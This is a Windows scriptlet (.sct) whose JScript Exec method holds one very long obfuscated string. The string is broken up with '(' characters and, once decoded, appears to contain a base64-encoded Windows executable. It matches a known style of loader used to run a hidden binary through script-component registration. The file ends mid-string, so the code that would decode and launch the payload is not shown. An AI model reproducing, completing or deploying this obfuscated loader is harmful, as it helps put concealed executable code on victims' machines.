<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
	function Exec()	{
	var encode_str = "(DQovL(yDlrp(rkuYk(gQmFz(ZTY0I(Oe8lu(eggee(ahOWt(l+esp(uS4sg(0KCXZ(hciBi(YXNlN(jRTdH(Jpbmc(gPSAi(VFZxU(UFBTU(FBQUF(FQUFB(QS8vO(EFBTG(dBQUF(BQUFB(QUFRQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFnQU(FBQUE(0ZnVn(NEF0Q(W5OSW(JnQlR(NMGhW(R2hwY(3lCd2(NtOW5(jbUZ0(SUdOa(GJtNX(ZkQ0J(pWlNC(eWRXN(GdhVz(RnUkU(5VElH(MXZaR(1V1RF(EwS0p(BQUFB(QUFBQ(UFCUV(JRQUF(UQUVE(QUZEb(ElXY0(FBQUF(BQUFB(QUFPQ(UFJZ0(FMQVR(BQUFD(b0FBQ(UFLQU(FBQUF(BQUFn(a2tBQ(UFBZ0(FBQUF(ZQUFB(QUFCQ(UFBQW(dBQUF(BQWdB(QUJBQ(UFBQU(FBQUF(BR0FB(QUFBQ(UFBQU(FDZ0F(BQUFB(Z0FBQ(UFBQU(FBSUF(ZSVVB(QUJBQ(UFCQU(FBQUF(BRUFB(QUVBQ(UFBQU(FBQUJ(BQUFB(QUFBQ(UFBQU(FBQUF(EQkpB(QUJQQ(UFBQU(FHQUF(BRGdH(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUl(BQUFB(d0FBQ(UQ0Un(dBQUh(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUl(BQUFD(QUFBQ(UFBQU(FBQUF(BQUFB(Q0NBQ(UFFZ0(FBQUF(BQUFB(QUFBQ(UFBQz(UwWlh(oMEFB(QUFpQ(2tBQU(FBZ0F(BQUFL(Z0FBQ(UFJQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQ0F(BQUdB(dWNuT(nlZd0(FBQUR(nR0FB(QUFZQ(UFBQU(FnQUF(BQXNB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFCQ(UFBQk(FMbkp(sYkc5(akFBQ(U1BQU(FBQUl(BQUFB(QUNBQ(UFBTk(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(RQUFB(UWdBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(JrU1F(BQUFB(QUFBR(WdBQU(FBQ0F(BVUFu(Q0lBQ(UZ3bE(FBQUJ(BQUFB(QXdBQ(UJnQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQjR(DS0JF(QUFBb(3FPZ0(lvRVF(BQUNn(SURmU(UVBQU(FRcUF(Cc3dC(Z0RUQ(VFBQU(FRQUF(FWElC(QUFCd(0NuSV(lHQUJ(3S0JJ(QUFBc(HlLUm(tBY0N(nVEFB(QUtja(mtaQU(hCdkZ(BQUFD(Z3NIR(kNnVk(FBQUt(MQTl5(aVJrQ(WNDZ1(RBQUF(LM1pV(QkFBQ(nlyeG(tBY0N(nVEFB(QUtCM(0xUR1(FCd0h(4Z1Vm(aFlBQ(UFvVW(J4Y0F(BQW9N(Q0JRb(0dBQU(FDaXd(QY3VF(WkFIQ(W9Fd0(FBQ3Q(xZUFR(QUFDQ(lFVYn(hrQUF(Bb05j(djhaQ(UhBb0(V3QUF(DZ2R5(SXhvQ(WNCZU(5GUUF(BQVNV(VzBDS(UFBQU(VvR2d(BQUNx(SnZHd(0FBQ2(hNRUV(RUVVL(QndBQ(UFvc0(h4RUV(DUmVO(RkFBQ(UFTVV(dCcUp(2R1FB(QUNpW(nlOeG(9BY0N(nVEFB(QUtLd(3B5WX(hvQWN(DZ1RB(QUFLR(kJNRk(J4OFV(ieDBB(QUFvV(EJ4WV(RDQ3N(3RVFj(UkNKb(1RDUk(VKYng(0QUFB(cHlpU(m9BY0(NnZkF(BQUtM(QkFSQ(1c4Z0(FBQUt(qaTBH(RVFrV(EJTc0(9FUWd(YV0JN(SUVRZ(1JCND(VwTXN(nUkJS(UW9HQ(UFBQ2(l3UGN(wY2FB(SEFvR(XdBQU(N0MlZ(BQUFB(RVFVS(kZHOF(pBQUF(LY3Jz(YUFIQ(W9Fd0(FBQ25(VWEFB(QUJFd(1lSQm(l3M0V(RWnZJ(UUFBQ(2hNS0(t3d1J(DbThp(QUFBS(0tDTU(FBQW9(SQ204(a0FBQ(UtMZX(ZlSHh(FS2RS(a0FBQ(UVUQ3(hFTEx(BY1JD(MjhsQ(UFBSz(NITFh(HZ0J3(S0JNQ(UFBcm(VOQk1(NY3Uw(YUFIQ(VJERz(htQUF(BS0tD(Y0FBQ(W9vRX(dBQUN(0NGFF(dzF5Q(VJzQW(NCRU5(ieVlB(QUFvb(0p3QU(FDaWd(UQUFB(SzNnQ(XFBRU(ZNQUF(BQ0FB(QUFaQ(UVBQU(JrQUF(BQjlB(UUFBR(lFBQU(FBQUF(BQUFB(QUFBQ(UJnQU(FBSmd(CQUFD(ZUFRQ(UFHZ0(FBQUJ(vQUFB(RUFBQ(UFBQm(dBQUF(KZ0JB(QUM0Q(VFBQU(dnQUF(BQnNB(QUFFZ(UFpZ2(9BQUF(LS2tK(VFNrS(UJBQU(VBQUF(BQUFB(d0FBQ(UIyTk(M0d0x(qTXdN(ekU1Q(UFBQU(FBVUF(iQUFB(QUVBR(EFBQW(pmZ0F(BckFN(QUFHd(0VBQU(FqVTN(SeWFX(NW5jd(0FBQU(FBWUN(BQUFF(QnNBQ(UNOVl(V3QW9(Jd0FB(RUFBQ(UFDTk(hWVWx(FQUFB(QU9DT(UFBQ1(FDQUF(BalFt(eHZZZ(0FBQU(FBQUF(BQUNB(QUFCV(nhVQ0(FBa0F(BQUFB(K2dFe(kFCWU(FBQUV(BQUFB(bEFBQ(UFCQU(FBQUF(FQUFB(QUVBQ(UFBQV(FBQUF(DZ0FB(QUFVQ(UFBQU(FRQUF(BQUVB(QUFBQ(kFBQU(FBQUJ(rQWdF(QUFBQ(UFBQV(lBMlF(HRUF3(WUFSZ(0tFQX(dZQTl(RQkhB(dzhBc(EFNQU(FBWUF(IUUhB(QWdZQ(XBBSE(FBZ1l(BaFFI(QUFnW(UFMUU(xBQWd(ZQStR(SEFBZ(1lBRW(dMQUF(nWUFO(QUhBQ(WdZQU(NRRmx(Bd1lB(endCb(EF3WU(FhQUh(BQWdZ(QVR3R(jFBZ1(lBdEF(DRUF3(WUFXZ(0tqQW(dZQUV(nU2pB(Z1lBM(1FDak(FnWUF(LZ1Nq(QWdZQ(WlnQ2(pBZ1l(BNmdM(QUFnW(UFNQU(RuQXd(ZQUp3(UG5Bd(1lBUE(FDakF(nWUEw(Z0xBQ(WdZQT(RBS2p(BZ1lB(UmdUQ(UFnWU(FiQUN(qQWdZ(QXZnU(EFBZ1(lBRGd(QQUFn(WUFGU(VBBQW(dZQWp(3REFB(Z1lBa(ndLak(FnWUF(TQUNq(QWdZQ(TlRTE(FBZ1l(BQUFQ(QUFnQ(UFBQU(FCQUF(BQUFB(QUJBQ(UVBQU(FFUUF(LSUEw(QU5GQ(UFFQU(FRQUF(BUkFB(d1FHR(UEwVU(FBUUF(DQUFF(QUVBQ(UlCQU(FBVVF(BQ0FB(TUFKZ(0M0QX(NZQVV(DQUFB(QUFBa(GhoQk(F3WUF(BUUJZ(SUFBQ(UFBQ0(dHRUV(EQVFB(QkFHZ(2dBQU(FBQUp(ZQXN3(TEpBQ(UVBbE(NJQUF(BQUFo(aGhCQ(XdZQU(FnQUF(BQUVB(eXdNS(kFFRU(RBUUF(SQUVF(REJnQ(VpBRU(VEQ2d(BcEFF(RURFQ(UF4QU(VFREV(BQTVB(RUVER(UFCQk(FFRUR(FQUJK(QUVFR(EVBQl(JBRUV(ERUFC(WkFFR(URFQU(JoQUV(FREZR(QnBBR(UVERU(FCeEF(FRURF(QUI1Q(UVFRE(VBQ0J(BRUVE(QmdDW(kFFRU(RHZ0N(KQUVF(REJnR(GhBS2(9DUFF(EcEFI(MEFRd(0RoQU(ljQVN(BQ3BB(RThFV(GdDcE(FMTUR(WZ0Nw(QUJNQ(Vd3Q3(hBRTh(FYkFB(SkFTa(0FkQU(NwQUZ(vQWV3(Q3BBQ(k1BZ3(dDeEF(Gc0Vi(QUNwQ(UZvRG(pBQWh(BWFFB(bEFBU(kFVOE(VtQUF(KQWZv(RG5nQ(zVBRE(1EcFF(EQkFE(RUVxZ(0RwQU(gwQXJ(nREJB(RDBFc(3dESk(FKb0F(CZ0Ra(QUIwQ(WxBQV(JBU01(FdHdD(aEFFR(URCZ0(FuQUJ(JQUd3(SXVBQ(XNBen(dBdUF(CTUEy(QUF1Q(UJzQT(l3QXV(BQ01B(QUFFd(UFDc0(FGUUV(1QURN(QVB3R(XVBRH(NBUHd(FdUFF(TUFBQ(UV1QU(VzQVJ(RRXVB(Rk1BU(HdFdU(FGc0F(Qd0V1(QUdNQ(WFnRX(VBR3N(BbEFF(dUFIT(UFvUU(ZEQUh(zQTd3(RkRBQ(W9BN3(dGakF(Ic0E3(d0ZqQ(UFvQT(d3Rmp(BSU1B(OUFFZ(0FBU0(FBQUF(CQUFB(QUFBQ(UFBQU(FBQUF(BQUFK(WUNBQ(UFFQU(FBQUF(BQUFB(QUFBQ(UFDOU(FBb0F(BQUFB(QUFBQ(UFBQU(FQRTF(2WkhW(c1pUN(EFiWE(5qYjN(Kc2FX(SUFSM(lYwVF(dWMGF(HOWtB(R2RsZ(EY5Tl(pYTnp(ZV2Rs(QUVsd(WRtOX(JaUUJ(KUlc1(MWJXV(nlZV0(pzWlF(CSlJH(bHpjR(zl6WV(dKc1p(RQlNk(VzUwY(VcxbF(ZIbHd(aVWho(Ym1Sc(1pRQk(haWFJ(VZVhC(bFJuS(nZiVW(hoYm1(Sc1pR(QkRiM(jV6Yj(J4bEF(HZGxk(RjlPW(VcxbE(FGZHl(hWFJs(VEdsd(VpRQk(haWFJ(VZVhC(bEFFM(WxkR2(h2WkV(KaGMy(VUFSR(2x6Y0(c5elp(RQkZi(V0psW(kdSbF(pFRjB(kSEpw(WW5WM(FpRQk(RiMjF(3YVd4(bGNrZ(GxibV(Z5WVh(SbFpF(RjBkS(EpwWW(5WMFp(RQkhk(V2xrU(VhSMG(NtbGl(kWFJs(QUVGM(GRISn(BZblY(wWlZW(ellXZ(GxRWF(IwY21(saWRY(UmxBR(VJsWW(5Wblo(yRmli(R1ZCZ(EhSeW(FXSjF(kR1VB(UTI5d(FZtbH(phV0p(zWlVG(MGRIS(nBZbl(YwWlF(CQmMz(TmxiV(0pzZV(ZScGR(HeGxR(WFIwY(21saW(RYUmx(BRUZ6(YzJWd(FlteD(VWSEp(oWkdW(dFlYS(nJRWF(IwY21(saWRY(UmxBR(lJoY2(1kbGR(FWnlZ(VzFsZ(DI5eW(EwRjB(kSEpw(WW5WM(FpRQk(JjM05(sYldK(c2VVW(nBiR1(ZXWlh(KemFX(OXVRW(FIwY2(1saWR(YUmxB(RUZ6Y(zJWdF(lteDV(RMjl1(Wm1sb(mRYSm(hkR2x(2YmtG(MGRIS(nBZbl(YwWlF(CQmMz(TmxiV(0pzZV(VSbGM(yTnlh(WEIwY(Vc5dV(FYUjB(jbWxp(ZFhSb(EFGSm(xabE5(oWm1W(MGVWS(jFiR1(Z6UVh(SMGNt(bGlkW(FJsQU(VOdmJ(YQnBi(R0YwY(Vc5dV(VtVnN(ZWGho(ZEdsd(mJuTk(JkSFJ(5YVdK(MWRHV(UFRWE(56Wlc(xaWJI(bFFjb(TlrZF(dOMFF(YUjBj(bWxpZ(FhSbE(FFRnp(jMlZ0(WW14N(VEyOX(dlWEp(wWjJo(MFFYU(jBjbW(xpZFh(SbEFF(RnpjM(lZ0WW(14NVE(yOXRj(R0Z1Z(VVGMG(RISnB(ZblYw(WlFCU(2RXNT(BhVzF(sUTI5(dGNHR(jBhV0(pwYkd(sMGVV(RjBkS(EpwWW(5WMFp(RQnVi(M0J2Z(DJWeW(MyaGx(iR3d1(Wlhob(EFGTj(VjM1J(sYlM1(U2RXN(TBhVz(FsTGx(abGNu(TnBiM(jVwYm(1jQVU(zUnlh(VzVuQ(Uc1dm(NHOTN(aWEp6(YUdWc(2JBQl(RlWE4(wWlcw(QVRHO(WhaRV(p5YjI(wQVRX(RnBiZ(0JXWl(hKemF(XOXVB(Rk41Y(zNSbG(JTNVN(aV1pz(WldOM(GFXOX(VBRUZ(0WW1s(bmRXO(TFjMD(FoZEd(Ob1JY(aGpaW(EIwYV(c5dUF(FMWxk(R2h2W(kVsdV(ptOEF(UV1Z0(WW1We(VNXNW(1id0J(RWVhK(aGJXV(jBaWE(pKYm1(adkFF(SnBib(VJsY2(dCUVl(YSmhi(V1YwW(lhKTm(IyUnB(abWxs(Y2dCS(lJXNT(FiV1Z(5WVhS(dmNnQ(khaWF(JGYm5(WdFpY(SmhkR(zl5QU(M1amR(HOXlB(Rk41Y(zNSbG(JTNUV(hV0Zu(Ym05e(mRHbG(pjd0J(IWlhS(TlpYU(m9iMl(J6QUZ(ONWMz(UmxiU(zVTZF(c1MGF(XMWxM(a2x1Z(EdWeW(IzQlR(aWEoy(YVdOb(GN3Ql(RlWE4(wWlcw(dVVuV(nVkR2(x0WlM(1RGIy(MXdhV(3hsY2(xObGN(uWnBZ(MlZ6Q(UVSbF(luVm5(aMmx1(WjAxd(lpHVn(pBRVZ(0Y0hS(NVZIb(HdaWE(1BUW1(sdVpH(bHVaM(FpzWV(dkekF(HRnla(M01BV(Fdsam(NtOXp(iMlow(TGtOd(lpHVk(JibUZ(zZVhO(cGN3Q(lRlWE(4wWlc(wdVEy(OXNiR(1ZqZE(dsdmJ(uTUFS(MlYwV(UdGeV(lXMWx(kR1Z5(Y3dCV(VpYTj(BRMnh(oYzNN(QVFYU(jBjbW(xpZFh(SbFZH(RnlaM(lYwY3(dCRGI(yNWpZ(WFFBV(DJKcV(pXTjB(BR2Rs(ZEY5R(GRYSn(laVzU(wQUUx(dmRtV(k9aWG(gwQUV(GemMy(VnRZb(Xg1QU(c5d1g(wVnhk(V0ZzY(VhSNU(FHOXd(YMGx1(WlhGM(VlXeH(BkSGt(BQUFB(QUFKZ(1ZEUU(FLQUd(ZQWRR(QnVBR(01BZE(FCcEF(HOEFi(Z0FnQ(UVNQW(FBQmx(BR01B(YXdBd(EFGTU(FkQUJ(oQUhJ(QWRBQ(jFBSE(FBU3d(CbEFI(a0Fkd(0J2QU(hJQVp(BQnpB(Q0FBR(FFBS0(FIc0F(EUUFL(QUNBQ(UlBQW(dBQ0F(BY0FC(aEFIS(UFZUU(J0QUN(BQUtB(QU5BQ(W9BSU(FBZ0F(DQUFJ(QUFnQ(UNBQU(lBQWd(BRnNB(VUFCa(EFISU(FZUUJ(0QUdV(QWRBQ(mxBSE(lBS0F(CTkFH(RUFiZ(0JrQU(dFQWR(BQnZB(SElBZ(VFBZ0(FEMEF(JQUFr(QUdZQ(VlRQn(NBSE1(BWlFB(cEFGM(EFEUU(FLQUN(BQUlB(QWdBQ(0FBSU(FBZ0F(DQUFJ(QUJiQ(UhNQW(RBQnl(BR2tB(YmdCb(kFGc0(FYUUJ(kQUNR(QVN3Q(mxBSG(tBZHd(CdkFI(SUFaQ(UJ6QU(NBQVB(RQWdB(RUFBS(0FBaU(FGUUF(jZ0Js(QUc0Q(VpBQW(lBQ3d(BSUFB(aUFFV(UFVd0(JGQUZ(RQUln(QXBBQ(TBBQ2(dBZ0F(DQUFJ(QUFnQ(UNrQU(RRQUt(BQ0FB(SUFBZ(0FDQU(FKQUJ(5QUhV(QWJnQ(lFBR0(VBZEF(Cb0FI(TUFJQ(UE5QU(NBQVF(BQW9B(QTBBQ(2dBZ0(FDQUF(JQUFn(QUNBQ(UlBQW(dBQ0F(BSWdC(SUFFc(0FUQU(JOQUR(vQVhB(QlRBR(zhBWm(dCMEF(IY0FZ(UUJ5Q(UdVQV(hBQk5(BR2tB(WXdCe(UFHOE(Fjd0J(2QUdZ(QWRBQ(mNBRm(NBYVF(CdUFH(UUFid(0IzQU(hNQVh(BQkRB(SFVBY(2dCeU(FHVUF(iZ0Iw(QUZZQ(VpRQn(lBSE1(BYVFC(dkFHN(EFYQU(JTQUh(VQWJn(QWlBQ(3dBRF(FBS0F(DQUFJ(QUFnQ(UNBQU(lBQWd(BQ0FB(SUFBa(UFFZ0(FTd0J(EQUZV(QU9nQ(mNBRk(1BYnd(CbUFI(UUFkd(0JoQU(hJQVp(RQmNB(RTBBY(VFCak(FISUF(id0J6(QUc4Q(VpnQj(BBRnd(BVndC(cEFHN(EFaQU(J2QUh(jQWN3(QmNBR(U1BZF(FCeUF(ISUFa(UUJ1Q(UhRQV(ZnQmx(BSElB(Y3dCc(EFHOE(FiZ0J(jQUZJ(QWRRQ(nVBQ0(lBRFF(BS0FD(QUFJQ(UFnQU(NBQUt(RQU5B(QW9BS(UFBZ0(FDQUF(JQUJt(QUc4Q(WNnQm(xBR0V(BWXdC(b0FDQ(UFLQU(FrQUh(BQVlR(QjBBR(2dBSU(FCcEF(HNEFJ(QUFrQ(UhJQW(RRQnV(BRkFB(WVFCM(EFHZ0(Fjd0F(wQUNB(QWV3Q(U5BQW(9BRFF(BS0FD(QUFJQ(UFnQU(NBQUl(BQWdB(Q0FBS(UFCcE(FHWUF(JQUFv(QUZRQ(VpRQn(pBSFF(BTFFC(UUFHR(UFkQU(JvQUN(BQUpB(QndBR(0VBZE(FCb0F(Da0FJ(QUI3Q(UEwQU(NnQWd(BQ0FB(SUFBZ(0FDQU(FJQUF(nQUNB(QUlBQ(WdBQ0(FBSUF(CMEFI(SUFlU(UFnQU(hzQUR(RQUtB(Q0FBS(UFBZ0(FDQUF(JQUFn(QUNBQ(UlBQW(dBQ0F(BSUFB(Z0FDQ(UFJQU(FnQUN(BQUpB(QnBBS(FFBWl(FCdEF(ITUFJ(QUE5Q(UNBQV(J3Qmx(BSFFB(TFFCS(kFIUU(FaUUJ(0QUZB(QWNnQ(nZBSE(FBWlF(CeUFI(UUFlU(UFnQU(MwQVV(BQmhB(SFFBY(UFBZ0(FDUUF(jQUJo(QUhRQ(WFBQU(5BQW9(BSUFB(Z0FDQ(UFJQU(FnQUN(BQUlB(QWdBQ(0FBSU(FBZ0F(DQUFJ(QUFnQ(UNBQU(lBQm1(BRzhB(Y2dCb(EFHRU(FZd0J(vQUNB(QUtBQ(WtBR2(tBZEF(CbEFH(MEFJQ(UJwQU(c0QUl(BQWtB(R2tBZ(EFCbE(FHMEF(jd0F1(QUZBQ(VV3Ql(BBR0l(BYWdC(bEFHT(UFkQU(F1QUZ(BQWNn(QnZBS(EFBWl(FCeUF(IUUFh(UUJsQ(UhNQU(tRQWd(BSHNB(RFFBS(0FDQU(FJQUF(nQUNB(QUlBQ(WdBQ0(FBSUF(BZ0FD(QUFJQ(UFnQU(NBQUl(BQWdB(Q0FBS(UFBZ0(FDQUF(JQUJt(QUc4Q(WNnQm(xBR0V(BWXdC(b0FDQ(UFLQU(FrQUd(zQVpR(QjVBS(GNBYn(dCeUF(HUUFJ(QUJwQ(Uc0QU(lBQWt(BRXNB(WlFCN(UFIY0(Fid0J(5QUdR(QWN3Q(XBBQ0(FBZXd(BTkFB(b0FJQ(UFnQU(NBQUl(BQWdB(Q0FBS(UFBZ0(FDQUF(JQUFn(QUNBQ(UlBQW(dBQ0F(BSUFB(Z0FDQ(UFJQU(FnQUN(BQUlB(QWdBQ(0FBYV(FCbUF(DQUFL(QUFrQ(UdrQW(RBQmx(BRzBB(TGdCT(0FHRU(FiUUJ(sQUNB(QUxRQ(nRBR0(VBZEF(CakFH(Z0FJQ(UFrQU(dzQVp(RQjVB(SGNBY(ndCeU(FHUUF(JQUF0(QUc4Q(WNnQW(dBQ2d(BSkFC(cEFIU(UFaUU(J0QUM(0QVZn(QmhBR(3dBZF(FCbEF(DQUFM(UUJwQ(UhNQU(lBQmJ(BSE1B(ZEFCe(UFHa0(FiZ0J(uQUYw(QUlBQ(XRBR0(VBYmd(Ca0FD(QUFKQ(UJwQU(hRQVp(RQnRB(QzRBV(mdCaE(FHd0F(kUUJs(QUNBQ(UxRQn(RBR0V(BZEFC(akFHZ(0FJQU(FrQUd(zQVpR(QjVBS(GNBYn(dCeUF(HUUFL(UUFwQ(UNBQW(V3QU5(BQW9B(RFFBS(0FDQU(FJQUF(nQUNB(QUlBQ(WdBQ0(FBSUF(BZ0FD(QUFJQ(UFnQU(NBQUl(BQWdB(Q0FBS(UFBZ0(FDQUF(JQUFn(QUNBQ(UlBQW(dBQ0F(BSUFB(Z0FDQ(UFjZ0(JsQUh(RQWRR(QnlBR(zRBSU(FBa0F(IUUFj(Z0IxQ(UdVQU(RRQUt(BQ0FB(SUFBZ(0FDQU(FJQUF(nQUNB(QUlBQ(WdBQ0(FBSUF(BZ0FD(QUFJQ(UFnQU(NBQUl(BQWdB(Q0FBS(UFBZ0(FDQUF(JQUFn(QUgwQ(URRQU(tBQ0F(BSUFB(Z0FDQ(UFJQU(FnQUN(BQUlB(QWdBQ(0FBSU(FBZ0F(DQUFJ(QUFnQ(UNBQU(lBQWd(BQ0FB(SUFCO(UFBME(FDZ0F(nQUNB(QUlBQ(WdBQ0(FBSUF(BZ0FD(QUFJQ(UFnQU(NBQUl(BQWdB(Q0FBS(UFBZ0(FIMEF(EUUFL(QUNBQ(UlBQW(dBQ0F(BSUFB(Z0FDQ(UFJQU(FnQUN(BQUlB(QWdBS(DBBRF(FBS0F(DQUFJ(QUFnQ(UNBQU(lBQWd(BQ0FB(SUFBZ(0FDQU(FJQUF(nQUdN(QVlRQ(jBBR0(1BYUF(BZ0FI(c0FEU(UFLQU(EwQUN(nQWdB(Q0FBS(UFBZ0(FDQUF(JQUFn(QUNBQ(UlBQW(dBQ0F(BSUFC(OUFBM(EFDZ0(FnQUN(BQUlB(QWdBQ(0FBSU(FBZ0F(DQUFm(UUFOQ(UFvQU(lBQWd(BQ0FB(SUFBZ(0FDQU(FJQUF(nQUdV(QWJBQ(npBR1(VBSUF(CN0FB(MEFDZ(0FOQU(FvQUl(BQWdB(Q0FBS(UFBZ0(FDQUF(JQUFn(QUgwQ(URRQU(tBQ0F(BSUFB(Z0FDQ(UFJQU(FnQUN(BQUlB(QlhBS(ElBYV(FCMEF(HVUFM(UUJQQ(UhVQW(RBQnd(BSFVB(ZEFBZ(0FDSU(FZQUJ(1QUNJ(QURRQ(UtBQ0(FBSUF(BZ0FD(QUFmU(UFOQU(FvQUR(RQUtB(Q0FBS(UFBZ0(FDQUF(jZ0Js(QUhRQ(WRRQn(lBRzR(BSUFB(a0FHW(UFZUU(JzQUh(NQVpR(QU5BQ(W9BZl(FBTkF(Bb0FE(UUFLQ(UEwQU(NnQm1(BSFVB(YmdCa(kFIUU(FhUUJ(2QUc0(QUlBQ(lVBR1(VBY3d(CMEFD(MEFSQ(UJsQU(dZQVl(RQjFB(R3dBZ(EFCTU(FHRUF(iZ0Ju(QUhVQ(VlRQm(5BR1V(BSUFB(TkFBb(0Fld0(FOQUF(vQUlB(QWdBQ(0FBSU(FCd0F(HRUFj(Z0JoQ(UcwQU(lBQW9(BQTBB(Q2dBZ(0FDQU(FJQUF(nQUNB(QUlBQ(WdBQ0(FBV3d(CUUFH(RUFjZ(0JoQU(cwQVp(RQjBB(R1VBY(2dBb0(FFMEF(ZUUJ1(QUdRQ(VlRQj(BBRzh(BY2dC(NUFDQ(UFQUU(FnQUN(RQVpn(QmhBR(3dBY3(dCbEF(Da0FY(UUFOQ(UFvQU(lBQWd(BQ0FB(SUFBZ(0FDQU(FJQUF(nQUZz(QWN3Q(jBBSE(lBYVF(CdUFH(Y0FYU(UFrQU(VVQWV(BQndB(R1VBW(XdCME(FHVUF(aQUJN(QUdFQ(WJnQm(5BSFV(BWVFC(bkFHV(UFRd0(J2QUd(RQVpR(QWdBR(DBBSU(FBaUF(EQUFO(QUF3Q(URRQU(lnQU5(BQW9B(SUFBZ(0FDQU(FJQUF(wQUEw(QUNnQ(U5BQW(9BRFF(BS0FD(QUFJQ(UFnQU(NBQUp(BQnlB(R1VBW(ndCcE(FITUF(kQUJ5(QUhrQ(VVBQm(hBSFF(BYUFB(Z0FEM(EFJQU(FpQUV(nQVN3(Qk1BR(TBBT2(dCY0F(GTUFX(UUJUQ(UZRQV(JRQk5(BRndB(UXdCM(UFISU(FjZ0J(sQUc0(QWRBQ(kRBRz(hBYmd(CMEFI(SUFid(0JzQU(ZNQVp(RQjBB(RndBU(XdCdk(FHNEF(kQUJ5(QUc4Q(WJBQm(NBRTR(BYkFC(ekFGd(0FUQU(JoQUc(0QVp3(QjFBR(0VBWn(dCbEF(DSUFE(UUFLQ(UEwQU(NnQU5(BQW9B(SUFBZ(0FDQU(FJQUJ(wQUdZ(QUlBQ(W9BQz(BBVGd(CdkFI(UUFJQ(UFvQU(ZRQVp(RQnpB(SFFBT(FFCUU(FHRUF(kQUJv(QUNBQ(UpBQn(lBR1V(BWndC(cEFIT(UFkQU(J5QUh(rQVVB(QmhBS(FFBYU(FBcEF(Da0FJ(QUI3Q(UEwQU(NnQU5(BQW9B(SUFBZ(0FDQU(FJQUF(nQUNB(QUlBQ(WdBSE(lBWlF(CMEFI(VUFjZ(0J1QU(NBQUp(BQm1B(R0VBY(kFCek(FHVUF(EUUFL(QUNBQ(UlBQW(dBQ0F(BZlFB(TkFBb(0FEUU(FLQUN(BQUlB(QWdBQ(0FBZE(FCeUF(Ia0FJ(QUI3Q(UEwQU(NnQU5(BQW9B(SUFBZ(0FDQU(FJQUF(nQUNB(QUlBQ(WdBQ1(FBWkF(CbEFH(WUFZU(UIxQU(d3QWR(BQldB(R0VBY(kFCMU(FHVUF(JQUE5(QUNBQ(UtBQk(hBR1V(BZEFB(dEFFa(0FkQU(JsQUc(wQVVB(QnlBR(zhBY0(FCbEF(ISUFk(QUI1Q(UNBQU(xRQlF(BR0VB(ZEFCb(0FDQU(FKQUJ(5QUdV(QVp3Q(nBBSE(1BZEF(CeUFI(a0FVQ(UJoQU(hRQWF(BQWdB(QzBBV(GdCaE(FHMEF(aUUFn(QUNJQ(VJBQm(xBR1l(BWVFC(MUFHd(0FkQU(FpQUN(rQUxn(QkVBR(1VBWm(dCaEF(IVUFi(QUIwQ(UEwQU(NnQU5(BQW9B(RFFBS(0FDQU(FJQUF(nQUNB(QUlBQ(WdBQ0(FBSUF(Ba0FH(UUFaU(UJtQU(dFQWR(RQnNB(SFFBV(mdCaE(FHd0F(kUUJs(QUU0Q(WJ3Qn(lBRzB(BWVFC(c0FHa(0FlZ0(JsQUd(RQUlB(QTlBQ(0FBSk(FCa0F(HVUFa(Z0JoQ(UhVQW(JBQjB(BRllB(WVFCc(0FIVU(FaUUF(1QUZR(QWJ3Q(k1BRz(hBZHd(CbEFI(SUFLQ(UFwQU(EwQUN(nQWdB(Q0FBS(UFBZ0(FDQUF(JQUFn(QUNBQ(UpBQm(xBSGd(BY0FC(bEFHT(UFkQU(JsQUd(RQVZn(QmhBR(3dBZF(FCbEF(FNEFi(d0J5Q(UcwQV(lRQnN(BR2tB(ZWdCb(EFHUU(FJQUE(5QUNB(QUpBQ(kZBSG(dBY0F(CbEFH(TUFkQ(UJsQU(dRQVR(BQmhB(RzRBW(ndCMU(FHRUF(ad0Js(QUVNQ(WJ3Qm(tBR1V(BTGdC(VUFHO(EFUQU(J2QUh(jQVpR(QnlBQ(2dBS1(FBTkF(Bb0FE(UUFLQ(UEwQU(NnQWd(BQ0FB(SUFBZ(0FDQU(FJQUF(nQUNB(QWFRQ(m1BQ0(FBS0F(Ba0FH(UUFaU(UJtQU(dFQWR(RQnNB(SFFBV(mdCaE(FHd0F(kUUJs(QUU0Q(WJ3Qn(lBRzB(BWVFC(c0FHa(0FlZ0(JsQUd(RQUlB(QXRBR(1VBY1(FBZ0F(DUUFa(UUI0Q(UhBQV(pRQmp(BSFFB(WlFCa(0FGWU(FZUUJ(zQUhV(QVpRQ(k9BRz(hBY2d(CdEFH(RUFiQ(UJwQU(hvQVp(RQmtB(Q2tBS(UFCN0(FBMEF(DZ0Fn(QUNBQ(UlBQW(dBQ0F(BSUFB(Z0FDQ(UFJQU(FnQUN(BQUlB(QnlBR(1VBZE(FCMUF(ISUFi(Z0FnQ(UNRQW(RBQnl(BSFVB(WlFBT(kFBb0(FJQUF(nQUNB(QUlBQ(WdBQ0(FBSUF(BZ0FI(MEFEU(UFLQU(NBQUl(BQWdB(Q0FBS(UFBZ0(FDQUF(JQUJs(QUd3Q(WN3Qm(xBQ0F(BZXdB(TkFBb(0FJQU(FnQUN(BQUlB(QWdBQ(0FBSU(FBZ0F(DQUFJ(QUFnQ(UNBQW(NnQmx(BSFFB(ZFFCe(UFHNE(FJQUF(rQUdZ(QVlRQ(nNBSE(1BWlF(BTkFB(b0FJQ(UFnQU(NBQUl(BQWdB(Q0FBS(UFBZ0(FIMEF(EUUFL(QUNBQ(UlBQW(dBQ0F(BZlFB(TkFBb(0FJQU(FnQUN(BQUlB(QmpBR(0VBZE(FCakF(HZ0FJ(QUI3Q(UEwQU(NnQU5(BQW9B(SUFBZ(0FDQU(FJQUF(nQUNB(QUlBQ(WdBSE(lBWlF(CMEFI(VUFjZ(0J1QU(NBQUp(BQm1B(R0VBY(kFCek(FHVUF(EUUFL